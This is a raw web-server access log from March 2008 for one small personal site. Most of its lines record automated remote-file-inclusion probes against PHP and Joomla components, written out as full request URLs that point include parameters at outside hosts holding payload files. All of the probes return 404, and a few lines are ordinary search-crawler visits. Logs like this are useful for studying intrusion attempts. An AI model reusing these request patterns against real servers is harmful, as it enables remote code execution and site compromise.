81.177.16.61 - - [25/Mar/2008:05:23:57 -0700] "GET /logs/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.244.247.47 - - [25/Mar/2008:05:24:14 -0700] "GET /test.php?page=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.156.192.5 - - [25/Mar/2008:05:24:39 -0700] "GET /logs//ultrastats/include/functions_common.php?gl_root_path=http://www.zdravenportal.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.156.192.5 - - [25/Mar/2008:05:24:39 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://www.zdravenportal.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:24:58 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:24:58 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:05:25:48 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:26:07 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:26:08 -0700] "GET /index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:26:08 -0700] "GET /logs/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:26:28 -0700] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.179 - - [25/Mar/2008:05:27:30 -0700] "GET /bikes/dteel/EQ2/?S=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:28:08 -0700] "GET /logs/access_080223.log/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:05:28:36 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:05:28:39 -0700] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.8.154.215 - - [25/Mar/2008:05:28:51 -0700] "GET /logs/access_080306.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [25/Mar/2008:05:28:52 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [25/Mar/2008:05:28:59 -0700] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:29:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:29:15 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.181.141.54 - - [25/Mar/2008:05:29:33 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.181.141.54 - - [25/Mar/2008:05:29:37 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.8.154.215 - - [25/Mar/2008:05:29:56 -0700] "GET /logs/access_080306.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [25/Mar/2008:05:29:56 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.157.205 - - [25/Mar/2008:05:30:00 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.76.157.205 - - [25/Mar/2008:05:30:00 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:30:15 -0700] "GET /logs/access_080223.log/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:30:15 -0700] "GET /logs/access_080312.log//claroline/phpbb/page_tail.php?includePath=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:30:16 -0700] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.21.120 - - [25/Mar/2008:05:30:19 -0700] "GET /bikes/dteel/10MAR07/?N=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:05:30:32 -0700] "GET /logs/access.log/!scanhttp://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:30:33 -0700] "GET /logs/access_071229.log/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:05:30:40 -0700] "GET /logs/access_080211.log/test.php?page=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:05:30:40 -0700] "GET /logs/test.php?page=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:05:31:28 -0700] "GET /logs/access_080215.log//ultrastats/include/functions_common.php?gl_root_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:05:31:28 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:05:31:29 -0700] "GET /logs//ultrastats/include/functions_common.php?gl_root_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:05:32:01 -0700] "GET /logs/access_080219.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:05:32:01 -0700] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:05:32:02 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:32:10 -0700] "GET /logs/access_080312.log//claroline/tracking/userLog.php?rootSys=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.45 - - [25/Mar/2008:05:32:14 -0700] "GET /logs/access_080117.log/test.php?page=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:33:20 -0700] "GET /logs/access.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:33:20 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.53 - - [25/Mar/2008:05:33:37 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [25/Mar/2008:05:33:38 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [25/Mar/2008:05:33:38 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:05:33:53 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:34:06 -0700] "GET /logs/access_080124.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:05:34:10 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.33.49.76 - - [25/Mar/2008:05:34:28 -0700] "GET //config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.49.76 - - [25/Mar/2008:05:34:28 -0700] "GET //config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.143.186.32 - - [25/Mar/2008:05:34:49 -0700] "GET /logs/access_080215.log//ultrastats/include/functions_common.php?gl_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [25/Mar/2008:05:34:49 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [25/Mar/2008:05:34:49 -0700] "GET /logs//ultrastats/include/functions_common.php?gl_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.244.247.47 - - [25/Mar/2008:05:34:54 -0700] "GET /logs/access_080211.log/test.php?page=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [25/Mar/2008:05:34:55 -0700] "GET /logs/test.php?page=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [25/Mar/2008:05:36:00 -0700] "GET /logs/access_080117.log/test.php?page=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:05:36:25 -0700] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:36:31 -0700] "GET ///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.53 - - [25/Mar/2008:05:36:31 -0700] "GET /?M=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:36:32 -0700] "GET //config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.187.213.53 - - [25/Mar/2008:05:36:36 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.109.108.140 - - [25/Mar/2008:05:36:37 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:36:37 -0700] "GET //config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:36:50 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:36:51 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
210.109.108.140 - - [25/Mar/2008:05:36:56 -0700] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:05:37:05 -0700] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.217.194 - - [25/Mar/2008:05:37:17 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
69.42.217.194 - - [25/Mar/2008:05:37:17 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:05:38:27 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.35 - - [25/Mar/2008:05:38:51 -0700] "GET /bikes/dteel/140CANON/?S=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.234 - - [25/Mar/2008:05:39:02 -0700] "GET /drop/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:05:39:13 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:39:16 -0700] "GET //config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:39:17 -0700] "GET //config.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:05:39:18 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:05:39:18 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:40:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:05:40:04 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:05:40:18 -0700] "GET /db.php?path_local=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:05:41:58 -0700] "GET /logs/access_080215.log//ultrastats/include/functions_common.php?gl_root_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:05:41:59 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:05:41:59 -0700] "GET /logs//ultrastats/include/functions_common.php?gl_root_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.159.107.162 - - [25/Mar/2008:05:42:32 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:05:42:59 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:05:42:59 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:05:43:12 -0700] "GET /logs/access_080215.log//ultrastats/include/functions_common.php?gl_root_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:05:43:13 -0700] "GET //ultrastats/include/functions_common.php?gl_root_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:05:43:13 -0700] "GET /logs//ultrastats/include/functions_common.php?gl_root_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.62 - - [25/Mar/2008:05:43:48 -0700] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:05:44:00 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:05:44:08 -0700] "GET /logs/access.log//classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:44:11 -0700] "GET /index.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:05:44:23 -0700] "GET //classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:05:44:30 -0700] "GET /logs//classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.31.119 - - [25/Mar/2008:05:44:50 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:05:45:05 -0700] "GET /logs/access.log//classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:05:45:05 -0700] "GET //classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.222.160 - - [25/Mar/2008:05:45:15 -0700] "GET /logs//classified_right.php?language_dir=http://www.heimkinopage.de/members/.debug/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.181.141.54 - - [25/Mar/2008:05:45:15 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.181.141.54 - - [25/Mar/2008:05:45:19 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.181.141.54 - - [25/Mar/2008:05:45:22 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.89 - - [25/Mar/2008:05:45:41 -0700] "GET /bikes/dteel/2008_02_16/?N=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.91 - - [25/Mar/2008:05:46:40 -0700] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.181.141.54 - - [25/Mar/2008:05:46:45 -0700] "GET /logs/access_080313.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:05:47:46 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:05:47:46 -0700] "GET /logs/db.php?path_local=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:05:48:07 -0700] "GET /homepage.php?sel=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.41 - - [25/Mar/2008:05:49:36 -0700] "GET /bikes/dteel/2008_02_16/?N=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:50:11 -0700] "GET /logs/access.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:05:50:26 -0700] "GET /index.php?inc_dir=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:05:52:08 -0700] "GET /logs/access_080124.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:52:17 -0700] "GET /logs/access_080201.log//config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.153.23 - - [25/Mar/2008:05:52:18 -0700] "GET /logs//config.php?inc_dir=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
